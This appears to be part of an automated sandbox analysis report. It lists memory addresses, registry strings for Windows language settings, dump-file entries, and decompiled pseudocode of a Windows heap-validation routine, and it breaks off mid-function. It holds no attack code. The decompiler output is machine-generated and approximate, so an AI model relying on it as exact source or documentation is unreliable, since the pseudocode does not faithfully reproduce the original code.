                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db11b
                                                                                                                                                              0x009db11e
                                                                                                                                                              0x009db125
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db137
                                                                                                                                                              0x009db13f
                                                                                                                                                              0x009db144
                                                                                                                                                              0x009db147
                                                                                                                                                              0x009db149
                                                                                                                                                              0x009db157
                                                                                                                                                              0x009db15a
                                                                                                                                                              0x009db15d
                                                                                                                                                              0x009db161
                                                                                                                                                              0x009db165
                                                                                                                                                              0x009db168
                                                                                                                                                              0x009db16b
                                                                                                                                                              0x009db16e
                                                                                                                                                              0x009db171
                                                                                                                                                              0x009db175
                                                                                                                                                              0x009db179
                                                                                                                                                              0x009db244
                                                                                                                                                              0x009db246
                                                                                                                                                              0x009db249
                                                                                                                                                              0x009db249
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db17f
                                                                                                                                                              0x009db17f
                                                                                                                                                              0x009db184
                                                                                                                                                              0x009db18c
                                                                                                                                                              0x009db18d
                                                                                                                                                              0x009db192
                                                                                                                                                              0x009db193
                                                                                                                                                              0x009db198
                                                                                                                                                              0x009db19a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db1a3
                                                                                                                                                              0x009db1a8
                                                                                                                                                              0x009db1b1
                                                                                                                                                              0x009db1bc
                                                                                                                                                              0x009db1c1
                                                                                                                                                              0x009db1c3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db1ce
                                                                                                                                                              0x009db1d3
                                                                                                                                                              0x009db1d5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db1db
                                                                                                                                                              0x009db1dd
                                                                                                                                                              0x009db1e0
                                                                                                                                                              0x009db1e0
                                                                                                                                                              0x009db1e4
                                                                                                                                                              0x009db1e5
                                                                                                                                                              0x009db1e5
                                                                                                                                                              0x009db1f3
                                                                                                                                                              0x009db1f5
                                                                                                                                                              0x009db1f7
                                                                                                                                                              0x009db1f9
                                                                                                                                                              0x009db214
                                                                                                                                                              0x009db214
                                                                                                                                                              0x009db216
                                                                                                                                                              0x009db216
                                                                                                                                                              0x009db218
                                                                                                                                                              0x009db233
                                                                                                                                                              0x009db233
                                                                                                                                                              0x009db235
                                                                                                                                                              0x009db235
                                                                                                                                                              0x009db23b
                                                                                                                                                              0x009db23e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db23e
                                                                                                                                                              0x009db21a
                                                                                                                                                              0x009db21c
                                                                                                                                                              0x009db21f
                                                                                                                                                              0x009db21f
                                                                                                                                                              0x009db223
                                                                                                                                                              0x009db224
                                                                                                                                                              0x009db224
                                                                                                                                                              0x009db22d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db22d
                                                                                                                                                              0x009db1fb
                                                                                                                                                              0x009db1fd
                                                                                                                                                              0x009db200
                                                                                                                                                              0x009db200
                                                                                                                                                              0x009db204
                                                                                                                                                              0x009db205
                                                                                                                                                              0x009db205
                                                                                                                                                              0x009db20e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db20e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db17f
                                                                                                                                                              0x009db14b
                                                                                                                                                              0x009db14b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db14b
                                                                                                                                                              0x009daf7e
                                                                                                                                                              0x009daf7e
                                                                                                                                                              0x009daf81
                                                                                                                                                              0x009daf84
                                                                                                                                                              0x009daf89
                                                                                                                                                              0x009daf91
                                                                                                                                                              0x009daf95
                                                                                                                                                              0x009daf98
                                                                                                                                                              0x009db00d
                                                                                                                                                              0x009db00e
                                                                                                                                                              0x009db013
                                                                                                                                                              0x009db015
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db01b
                                                                                                                                                              0x009db022
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db028
                                                                                                                                                              0x009db02f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db035
                                                                                                                                                              0x009db038
                                                                                                                                                              0x009db038
                                                                                                                                                              0x009db03a
                                                                                                                                                              0x009db0b9
                                                                                                                                                              0x009db0be
                                                                                                                                                              0x009db0c0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db0d6
                                                                                                                                                              0x009db0d6
                                                                                                                                                              0x009db0d9
                                                                                                                                                              0x009db0d9
                                                                                                                                                              0x009db0db
                                                                                                                                                              0x009db0f6
                                                                                                                                                              0x009db0f6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db0f6
                                                                                                                                                              0x009db0dd
                                                                                                                                                              0x009db0df
                                                                                                                                                              0x009db0e2
                                                                                                                                                              0x009db0e2
                                                                                                                                                              0x009db0e6
                                                                                                                                                              0x009db0e7
                                                                                                                                                              0x009db0e7
                                                                                                                                                              0x009db0f0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db0f0
                                                                                                                                                              0x009db03c
                                                                                                                                                              0x009db03c
                                                                                                                                                              0x009db03d
                                                                                                                                                              0x009db04e
                                                                                                                                                              0x009db055
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db05b
                                                                                                                                                              0x009db05f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db065
                                                                                                                                                              0x009db068
                                                                                                                                                              0x009db06a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db070
                                                                                                                                                              0x009db072
                                                                                                                                                              0x009db046
                                                                                                                                                              0x009db046
                                                                                                                                                              0x009db08c
                                                                                                                                                              0x009db098
                                                                                                                                                              0x009db09d
                                                                                                                                                              0x009db09f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db0a5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db0a5
                                                                                                                                                              0x009db074
                                                                                                                                                              0x009db076
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db07c
                                                                                                                                                              0x009db080
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db086
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db086
                                                                                                                                                              0x009db03f
                                                                                                                                                              0x009db040
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db040
                                                                                                                                                              0x009daf9a
                                                                                                                                                              0x009daf9c
                                                                                                                                                              0x009daf9d
                                                                                                                                                              0x009dafa2
                                                                                                                                                              0x009dafa4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009dafaa
                                                                                                                                                              0x009dafb1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009dafb7
                                                                                                                                                              0x009dafbe
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009dafc7
                                                                                                                                                              0x009dafcc
                                                                                                                                                              0x009dafd5
                                                                                                                                                              0x009dafe0
                                                                                                                                                              0x009dafe5
                                                                                                                                                              0x009dafe7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009dafed
                                                                                                                                                              0x009daff0
                                                                                                                                                              0x009daff3
                                                                                                                                                              0x009daff3
                                                                                                                                                              0x009daff7
                                                                                                                                                              0x009daff8
                                                                                                                                                              0x009daff8
                                                                                                                                                              0x009daffd
                                                                                                                                                              0x009db008
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009db0f8
                                                                                                                                                              0x009db0f8
                                                                                                                                                              0x009db0fe
                                                                                                                                                              0x009db0fe
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009daf84
                                                                                                                                                              0x009daf63
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009daf63
                                                                                                                                                              0x009dae77
                                                                                                                                                              0x009dae7c
                                                                                                                                                              0x009dae7f
                                                                                                                                                              0x009dae81
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009dae8a
                                                                                                                                                              0x009dae93
                                                                                                                                                              0x009dae93
                                                                                                                                                              0x009dae96
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009dae96
                                                                                                                                                              0x009dae5c
                                                                                                                                                              0x009dae0f
                                                                                                                                                              0x009dae0f
                                                                                                                                                              0x009dae0f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009dae0d
                                                                                                                                                              0x009dadd3
                                                                                                                                                              0x009dad9f
                                                                                                                                                              0x009dad48
                                                                                                                                                              0x009dad4e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009dad50
                                                                                                                                                              0x009dad52
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009dad52
                                                                                                                                                              0x009dad3b
                                                                                                                                                              0x009dad41
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009dad41
                                                                                                                                                              0x009dad2d
                                                                                                                                                              0x009dad30
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009dad30
                                                                                                                                                              0x009dad1a
                                                                                                                                                              0x009dad1c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009dad1e
                                                                                                                                                              0x009dad24
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009dad24
                                                                                                                                                              0x009dad06
                                                                                                                                                              0x009dad08
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009dad0a
                                                                                                                                                              0x009dad10
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009dad10
                                                                                                                                                              0x009dacdd
                                                                                                                                                              0x009dacdd
                                                                                                                                                              0x00000000

                                                                                                                                                              Strings
                                                                                                                                                              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 009DADC1
                                                                                                                                                              • Control Panel\Desktop, xrefs: 009DB379
                                                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 009DB4C0
                                                                                                                                                              • InstallLanguageFallback, xrefs: 009DB28C
                                                                                                                                                              • LanguageConfigurationPending, xrefs: 009DB3DA
                                                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 009DB25B
                                                                                                                                                              • PreferredUILanguagesPending, xrefs: 009DB3AC
                                                                                                                                                              • PreferredUILanguages, xrefs: 009DB4F5
                                                                                                                                                              • LanguageConfiguration, xrefs: 009DB53A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                                                                              • API String ID: 0-257526532
                                                                                                                                                              • Opcode ID: d8af9bcf18ae913118adb25f7d236b6c5868894e737776947e53f1b380f9f0ae
                                                                                                                                                              • Instruction ID: 434e702c1980796eafd6162e383ad9e3ef74e375859374992ad8c27227796c71
                                                                                                                                                              • Opcode Fuzzy Hash: d8af9bcf18ae913118adb25f7d236b6c5868894e737776947e53f1b380f9f0ae
                                                                                                                                                              • Instruction Fuzzy Hash: 36626771D40218EBDF21DFA8C885BEEBBB8EF48710F15802AF915EB261D7749944CB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009EFDDD, Relevance: 12.0, Strings: 9, Instructions: 799COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                              			E009EFDDD(signed int _a4, signed int _a8, intOrPtr* _a16, signed int* _a20, signed int* _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t339;
				intOrPtr _t361;
				signed int _t365;
				signed short _t377;
				signed char _t380;
				signed int* _t382;
				signed char _t383;
				signed int _t384;
				intOrPtr _t386;
				unsigned int _t401;
				signed int _t402;
				intOrPtr _t409;
				intOrPtr _t423;
				signed int _t450;
				intOrPtr _t452;
				intOrPtr* _t463;
				signed int _t465;
				signed int* _t466;
				signed int _t467;
				intOrPtr _t468;
				signed short _t469;
				signed int _t471;
				signed int _t472;
				signed int _t475;
				signed short* _t486;
				signed short _t487;
				signed int* _t489;
				signed int _t490;
				signed int _t498;
				signed int _t501;
				signed int _t502;
				signed int _t511;
				signed short _t513;
				signed short _t514;
				signed int _t515;
				signed int* _t519;
				signed int _t523;
				signed int _t532;
				signed int _t534;
				signed int* _t535;
				signed int _t537;
				void* _t539;
				signed int _t549;
				signed int _t551;
				intOrPtr _t557;
				intOrPtr _t561;
				signed int _t570;
				intOrPtr* _t582;
				signed int _t583;
				signed int* _t584;
				void* _t585;
				signed int _t586;
				signed int _t588;
				signed int _t589;
				signed int _t590;
				signed int _t592;
				signed int* _t594;
				signed short _t595;
				signed short _t597;
				signed int _t604;
				signed int _t605;
				signed int _t607;
				signed short _t609;
				signed short _t611;
				signed int _t613;
				signed int _t615;
				signed int _t616;
				signed int _t621;
				signed int _t622;
				signed int _t623;
				intOrPtr _t626;
				signed int* _t627;
				intOrPtr _t628;
				signed int _t630;
				signed int* _t632;
				signed int _t633;
				signed int _t634;
				signed int _t636;
				signed int _t638;
				signed int* _t642;
				signed short _t643;
				signed short _t645;
				signed int _t646;
				void* _t650;
				signed int _t652;
				signed int _t654;
				signed int* _t656;
				signed short _t664;
				signed short _t667;
				intOrPtr _t668;
				intOrPtr _t669;
				signed int _t670;
				signed int _t671;
				void* _t690;

				_t671 = _a8;
				_t339 = 0;
				_v32 = 0;
				_v36 = 0;
				_v24 = 0;
				if(_t671 >=  *((intOrPtr*)(_t671 + 0x28))) {
					L176:
					_t668 = _v32;
					__eflags =  *((intOrPtr*)(_t671 + 0x2c)) - _t668;
					if( *((intOrPtr*)(_t671 + 0x2c)) == _t668) {
						_t669 = _v36;
						__eflags =  *((intOrPtr*)(_t671 + 0x30)) - _t669;
						if( *((intOrPtr*)(_t671 + 0x30)) == _t669) {
							goto L203;
						}
						_t557 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *((intOrPtr*)(_t557 + 0xc)) - _t339;
						if( *((intOrPtr*)(_t557 + 0xc)) == _t339) {
							_push("HEAP: ");
							E0099373B();
						} else {
							E0099373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_t669);
						_push( *((intOrPtr*)(_t671 + 0x30)));
						_push(_t671);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L211:
						E0099373B();
						goto L186;
					}
					_t561 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
					__eflags =  *((intOrPtr*)(_t561 + 0xc)) - _t339;
					if( *((intOrPtr*)(_t561 + 0xc)) == _t339) {
						_push("HEAP: ");
						E0099373B();
					} else {
						E0099373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t668);
					_push( *((intOrPtr*)(_t671 + 0x2c)));
					_push(_t671);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L211;
				} else {
					_t670 = _a4;
					do {
						_t532 = 0;
						 *_a24 = _t671;
						if( *(_t670 + 0x4c) != 0) {
							 *_t671 =  *_t671 ^  *(_t670 + 0x50);
							_t679 =  *(_t671 + 3) - ( *(_t671 + 2) ^  *(_t671 + 1) ^  *_t671);
							if( *(_t671 + 3) != ( *(_t671 + 2) ^  *(_t671 + 1) ^  *_t671)) {
								_push(0);
								_push(_t671);
								_push(_t670);
								E009EF8EE(0, _t670, _t671, _t679);
							}
						}
						if(_v24 != ( *(_t671 + 4) ^  *(_t670 + 0x54))) {
							_t361 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *((intOrPtr*)(_t361 + 0xc)) - _t532;
							if( *((intOrPtr*)(_t361 + 0xc)) == _t532) {
								_push("HEAP: ");
								E0099373B();
							} else {
								E0099373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v24 & 0x0000ffff);
							_t365 =  *(_t671 + 4) & 0x0000ffff ^  *(_t670 + 0x54) & 0x0000ffff;
							__eflags = _t365;
							_push(_t365);
							E0099373B("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t671);
							L183:
							_t690 =  *(_t670 + 0x4c) - _t532;
							L184:
							if(_t690 != 0) {
								 *(_t671 + 3) =  *(_t671 + 2) ^  *(_t671 + 1) ^  *_t671;
								 *_t671 =  *_t671 ^  *(_t670 + 0x50);
							}
							L186:
							return 0;
						}
						_t377 =  *_t671 & 0x0000ffff;
						_v24 = _t377 & 0x0000ffff;
						_t568 = _t377 & 0x0000ffff;
						_a4 = _t568 << 3;
						_t380 =  *(_t671 + 2);
						if((_t380 & 0x00000001) == 0) {
							__eflags =  *(_t670 + 0x40) & 0x00000040;
							if(( *(_t670 + 0x40) & 0x00000040) == 0) {
								L154:
								 *_a16 =  *_a16 + 1;
								_t382 = _a20;
								 *_t382 =  *_t382 + ( *_t671 & 0x0000ffff);
								__eflags =  *_t382;
								L155:
								_t383 =  *(_t671 + 6);
								__eflags = _t383;
								if(_t383 == 0) {
									_t384 = _t670;
								} else {
									_t384 = (_t671 & 0xffff0000) - ((_t383 & 0x000000ff) << 0x10) + 0x10000;
								}
								_t570 = _a8;
								__eflags = _t384 - _t570;
								if(_t384 != _t570) {
									_t386 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									__eflags =  *((intOrPtr*)(_t386 + 0xc)) - _t532;
									if( *((intOrPtr*)(_t386 + 0xc)) == _t532) {
										_push("HEAP: ");
										E0099373B();
									} else {
										E0099373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *(_t671 + 6) & 0x000000ff);
									_push(_t671);
									_push("Heap block at %p has incorrect segment offset (%x)\n");
									goto L195;
								} else {
									__eflags =  *((char*)(_t671 + 7)) - 3;
									if( *((char*)(_t671 + 7)) != 3) {
										__eflags =  *(_t670 + 0x4c) - _t532;
										if( *(_t670 + 0x4c) != _t532) {
											 *(_t671 + 3) =  *(_t671 + 1) ^  *_t671 ^  *(_t671 + 2);
											 *_t671 =  *_t671 ^  *(_t670 + 0x50);
											__eflags =  *_t671;
										}
										_t671 = _t671 + _a4;
										__eflags = _t671;
										goto L174;
									}
									_t401 =  *(_t671 + 0x1c);
									__eflags = _t401 - _t532;
									if(_t401 == _t532) {
										_t402 =  *_t671 & 0x0000ffff;
										__eflags = _t671 + _t402 * 8 -  *((intOrPtr*)(_t570 + 0x28));
										if(_t671 + _t402 * 8 ==  *((intOrPtr*)(_t570 + 0x28))) {
											__eflags =  *(_t670 + 0x4c) - _t532;
											if( *(_t670 + 0x4c) != _t532) {
												 *(_t671 + 3) =  *(_t671 + 2) ^  *(_t671 + 1) ^  *_t671;
												 *_t671 =  *_t671 ^  *(_t670 + 0x50);
												__eflags =  *_t671;
											}
											L203:
											return 1;
										}
										_t409 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
										__eflags =  *((intOrPtr*)(_t409 + 0xc)) - _t532;
										if( *((intOrPtr*)(_t409 + 0xc)) == _t532) {
											_push("HEAP: ");
											E0099373B();
										} else {
											E0099373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *((intOrPtr*)(_a8 + 0x28)));
										_push(_t671);
										_push("Heap block at %p is not last block in segment (%p)\n");
										L195:
										E0099373B();
										goto L183;
									}
									_v36 = _v36 + 1;
									_v32 = _v32 + (_t401 >> 0xc);
									__eflags =  *(_t670 + 0x4c) - _t532;
									if( *(_t670 + 0x4c) != _t532) {
										 *(_t671 + 3) =  *(_t671 + 1) ^  *_t671 ^  *(_t671 + 2);
										 *_t671 =  *_t671 ^  *(_t670 + 0x50);
										__eflags =  *_t671;
									}
									_t671 = _t671 +  *(_t671 + 0x1c) + 0x20;
									__eflags = _t671 -  *((intOrPtr*)(_t570 + 0x28));
									if(_t671 ==  *((intOrPtr*)(_t570 + 0x28))) {
										L170:
										_v24 = _t532;
										goto L174;
									} else {
										__eflags =  *(_t670 + 0x4c) - _t532;
										if( *(_t670 + 0x4c) != _t532) {
											 *_t671 =  *_t671 ^  *(_t670 + 0x50);
											__eflags =  *(_t671 + 3) - ( *(_t671 + 2) ^  *(_t671 + 1) ^  *_t671);
											if(__eflags != 0) {
												_push(_t532);
												_push(_t671);
												_push(_t670);
												E009EF8EE(_t532, _t670, _t671, __eflags);
											}
										}
										__eflags =  *(_t671 + 4) ^  *(_t670 + 0x54);
										if(( *(_t671 + 4) ^  *(_t670 + 0x54)) != 0) {
											_t423 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
											__eflags =  *((intOrPtr*)(_t423 + 0xc)) - _t532;
											if( *((intOrPtr*)(_t423 + 0xc)) == _t532) {
												_push("HEAP: ");
												E0099373B();
											} else {
												E0099373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
											}
											_push( *(_t671 + 4) & 0x0000ffff ^  *(_t670 + 0x54) & 0x0000ffff);
											_push(_t671);
											_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
											goto L195;
										} else {
											__eflags =  *(_t670 + 0x4c) - _t532;
											if( *(_t670 + 0x4c) != _t532) {
												 *(_t671 + 3) =  *(_t671 + 2) ^  *(_t671 + 1) ^  *_t671;
												 *_t671 =  *_t671 ^  *(_t670 + 0x50);
												__eflags =  *_t671;
											}
											goto L170;
										}
									}
								}
							}
							__eflags = _t380 & 0x00000004;
							if((_t380 & 0x00000004) == 0) {
								goto L154;
							}
							_t534 = _a4 + 0xfffffff0;
							__eflags = _t380 & 0x00000002;
							if((_t380 & 0x00000002) != 0) {
								__eflags = _t534 - 4;
								if(_t534 > 4) {
									_t534 = _t534 - 4;
									__eflags = _t534;
								}
							}
							__eflags = _t380 & 0x00000008;
							if((_t380 & 0x00000008) == 0) {
								_t450 = E00978950(_t671 + 0x10, _t534, 0xfeeefeee);
								_v40 = _t450;
								__eflags = _t450 - _t534;
								if(_t450 != _t534) {
									_t452 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									__eflags =  *(_t452 + 0xc);
									if( *(_t452 + 0xc) == 0) {
										_push("HEAP: ");
										E0099373B();
									} else {
										E0099373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
									}
									_push(_t671 + 8 + _v40);
									E0099373B("Free Heap block %p modified at %p after it was freed\n", _t671);
									__eflags =  *(_t670 + 0x4c);
									goto L184;
								}
								_t532 = 0;
								__eflags = 0;
								goto L154;
							} else {
								_t535 =  *(_t671 + 0xc);
								_t463 = _t671 + 8;
								_t627 =  *_t463;
								_v12 = _t627;
								_t628 =  *((intOrPtr*)(_t627 + 4));
								_v40 = _t535;
								_t536 =  *_t535;
								__eflags = _t536 - _t628;
								if(__eflags != 0) {
									L61:
									_push(0);
									_push(_t536);
									_push(_t628);
									_push(_t463);
									_push(_t670);
									_push(0xc);
									E009EF840(_t536, _t568, _t628, _t670, _t671, __eflags);
									goto L174;
								}
								__eflags = _t536 - _t463;
								if(__eflags != 0) {
									goto L61;
								}
								_t465 =  *(_t670 + 0xb8);
								 *((intOrPtr*)(_t670 + 0x78)) =  *((intOrPtr*)(_t670 + 0x78)) - _t568;
								__eflags = _t465;
								if(_t465 == 0) {
									L58:
									_t466 = _v12;
									_t582 = _v40;
									 *_t582 = _t466;
									 *((intOrPtr*)(_t466 + 4)) = _t582;
									__eflags =  *(_t671 + 2) & 0x00000008;
									if(__eflags == 0) {
										L62:
										_t537 =  *_t671 & 0x0000ffff;
										 *(_t671 + 2) = 0;
										 *((char*)(_t671 + 7)) = 0;
										_t467 =  *(_t670 + 0xb8);
										_v20 = _t537;
										__eflags = _t467;
										if(_t467 != 0) {
											while(1) {
												__eflags = _t537 -  *((intOrPtr*)(_t467 + 4));
												if(_t537 <  *((intOrPtr*)(_t467 + 4))) {
													break;
												}
												_t583 =  *_t467;
												__eflags = _t583;
												if(_t583 == 0) {
													_t630 =  *((intOrPtr*)(_t467 + 4)) - 1;
													__eflags = _t630;
													_v28 = _t630;
													L75:
													_t584 = _t467 + 0x14;
													while(1) {
														_a4 = _t467;
														_v16 = _t630 -  *_t584;
														_t632 =  *((intOrPtr*)(_t467 + 0x18));
														_t468 =  *((intOrPtr*)(_t632 + 4));
														_v12 = _t632;
														__eflags = _t632 - _t468;
														if(_t632 != _t468) {
															goto L78;
														}
														L77:
														_v8 = _t632;
														L121:
														_t472 = _v8;
														__eflags = _t472;
														if(_t472 != 0) {
															L64:
															_t107 = _t670 + 0xc4; // 0xc5
															_t539 = _t107;
															__eflags = _t539 - _t472;
															if(_t539 == _t472) {
																L126:
																_t634 =  *(_t472 + 4);
																_t585 =  *_t634;
																__eflags = _t585 - _t472;
																if(_t585 != _t472) {
																	__eflags = 0;
																	_push(0);
																	_push(_t585);
																	_push(0);
																	_push(_t472);
																	_push(0);
																	_push(0xc);
																	E009EF840(_t539, _t585, 0, _t670, _t671, 0);
																} else {
																	_t594 = _t671 + 8;
																	 *_t594 = _t472;
																	_t594[1] = _t634;
																	 *_t634 = _t594;
																	 *(_t472 + 4) = _t594;
																}
																 *((intOrPtr*)(_t670 + 0x78)) =  *((intOrPtr*)(_t670 + 0x78)) + ( *_t671 & 0x0000ffff);
																_t475 =  *(_t670 + 0xb8);
																__eflags = _t475;
																if(_t475 == 0) {
																	L150:
																	__eflags =  *(_t670 + 0x4c);
																	if( *(_t670 + 0x4c) != 0) {
																		 *(_t671 + 3) =  *(_t671 + 1) ^  *_t671 ^  *(_t671 + 2);
																		 *_t671 =  *_t671 ^  *(_t670 + 0x50);
																	}
																	goto L174;
																} else {
																	_t586 =  *_t671 & 0x0000ffff;
																	while(1) {
																		__eflags = _t586 -  *((intOrPtr*)(_t475 + 4));
																		if(_t586 <  *((intOrPtr*)(_t475 + 4))) {
																			break;
																		}
																		_t636 =  *_t475;
																		__eflags = _t636;
																		if(_t636 == 0) {
																			_t638 =  *((intOrPtr*)(_t475 + 4)) - 1;
																			__eflags = _t638;
																			L136:
																			_t588 = _t638 -  *((intOrPtr*)(_t475 + 0x14));
																			__eflags =  *(_t475 + 8);
																			_v28 = _t588;
																			if( *(_t475 + 8) != 0) {
																				_t588 = _t588 + _t588;
																				__eflags = _t588;
																			}
																			 *((intOrPtr*)(_t475 + 0xc)) =  *((intOrPtr*)(_t475 + 0xc)) + 1;
																			_t589 = _t588 << 2;
																			_a4 = _t589;
																			_t590 =  *(_t589 +  *((intOrPtr*)(_t475 + 0x20)));
																			_v40 = _t590;
																			__eflags = _t638 -  *((intOrPtr*)(_t475 + 4)) - 1;
																			if(_t638 ==  *((intOrPtr*)(_t475 + 4)) - 1) {
																				_t207 = _t475 + 0x10;
																				 *_t207 =  *(_t475 + 0x10) + 1;
																				__eflags =  *_t207;
																			}
																			__eflags = _t590;
																			if(_t590 == 0) {
																				L147:
																				 *((intOrPtr*)(_a4 +  *((intOrPtr*)(_t475 + 0x20)))) = _t671 + 8;
																				_t590 = _v40;
																				goto L148;
																			} else {
																				__eflags =  *(_t670 + 0x4c);
